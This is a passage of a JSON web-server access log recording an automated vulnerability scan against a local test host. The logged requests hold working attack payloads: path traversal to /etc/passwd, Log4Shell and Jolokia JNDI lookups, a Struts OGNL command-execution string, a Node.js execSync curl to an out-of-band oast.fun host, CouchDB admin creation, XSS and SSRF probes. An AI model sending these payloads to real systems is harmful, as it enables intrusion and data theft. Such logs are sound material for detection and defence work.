HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /29KAXzpNxF2X53pjSgAm0lo1EP8.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.ca285tosmpvbafqg07h07mqt3dn5naf53.oast.fun/a%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAXzpNxF2X53pjSgAm0lo1EP8.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/read_body.php?mailbox=/etc/passwd&passed_id=1& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://ca285tosmpvbafqg07h0hbufs5qua4ata.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://ca285tosmpvbafqg07h06cituxrz7ose7.oast.fun\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", 